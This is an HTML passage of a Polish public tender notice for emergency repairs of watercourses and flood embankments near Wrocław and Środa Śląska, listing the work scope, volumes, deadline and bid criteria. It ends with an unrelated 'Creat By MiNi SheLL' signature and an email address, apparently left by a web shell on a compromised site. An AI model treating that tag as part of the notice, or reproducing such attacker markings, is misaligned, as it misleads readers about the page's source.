- wykonanie w stopie skarpy opasek z kiszek faszynowych pojedynczych o średnicy 20 cm,
- darniowanie skarpy pasem szerokości min. 1,5 m i obsiew pozostałej części,
- oczyszczenie i uporządkowanie terenu w obrębie prowadzonych prac.

Podstawowy zakres prac przy usuwaniu uszkodzeń powstałych na urządzeniach wodnych (wałach przeciwpowodziowych) obejmuje:
- przygotowanie miejsca pracy,
- wykoszenie i wygrabienie porostów w obrębie uszkodzenia,
- usunięcie warstwy ziemi urodzajnej (humusu),
- wykonanie wykopu do poziomu korytarzy wykonanych przez zwierzęta,
- zasypanie wykopów gruntem z odkładu i zakupionym,
- zagęszczenie, plantowanie, humusowanie,
- obsiew,
- oczyszczenie i uporządkowanie terenu w obrębie prowadzonych prac.

Zagęszczenie gruntu w zabudowanej wyrwie do Is większej równej 95. Stopień zagęszczenia potwierdzony przez geotechnika.

Przewidywana max. łączna (w ciągu trwania umowy) ilość m3 na usunięcie uszkodzeń na ciekach i urządzeniach wodnych wynosi 363 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.72.18.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Czas reakcji - podjęcia działania - 20</li>
<li>3. Gwarancja na przdmiot zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prace interwencyjne - usuwanie uszkodzeń na ciekach i urządzeniach wodnych, pow. Wrocław, Środa Śląska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są prace interwencyjne polegające na usuwaniu uszkodzeń powstałych na ciekach i urządzeniach wodnych (wałach przeciwpowodziowych). 

Podstawowy zakres prac przy usuwaniu uszkodzeń powstałych na ciekach obejmuje:
- przygotowanie miejsca pracy,
- zabudowę wyrwy, plantowanie skarpy, formowanie skarpy i zagęszczenie,
- wykonanie w stopie skarpy opasek z kiszek faszynowych pojedynczych o średnicy 20 cm,
- darniowanie skarpy pasem szerokości min. 1,5 m i obsiew pozostałej części,
- oczyszczenie i uporządkowanie terenu w obrębie prowadzonych prac.

Podstawowy zakres prac przy usuwaniu uszkodzeń powstałych na urządzeniach wodnych (wałach przeciwpowodziowych) obejmuje:
- przygotowanie miejsca pracy,
- wykoszenie i wygrabienie porostów w obrębie uszkodzenia,
- usunięcie warstwy ziemi urodzajnej (humusu),
- wykonanie wykopu do poziomu korytarzy wykonanych przez zwierzęta,
- zasypanie wykopów gruntem z odkładu i zakupionym,
- zagęszczenie, plantowanie, humusowanie,
- obsiew,
- oczyszczenie i uporządkowanie terenu w obrębie prowadzonych prac.

Zagęszczenie gruntu w zabudowanej wyrwie do Is większej równej 95. Stopień zagęszczenia potwierdzony przez geotechnika.

Przewidywana max. łączna (w ciągu trwania umowy) ilość m3 na usunięcie uszkodzeń na ciekach i urządzeniach wodnych wynosi 664 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.72.18.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Czas reakcji - podjęcia działania - 20</li>
<li>3. Gwarancja na przdmiot zamówienia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com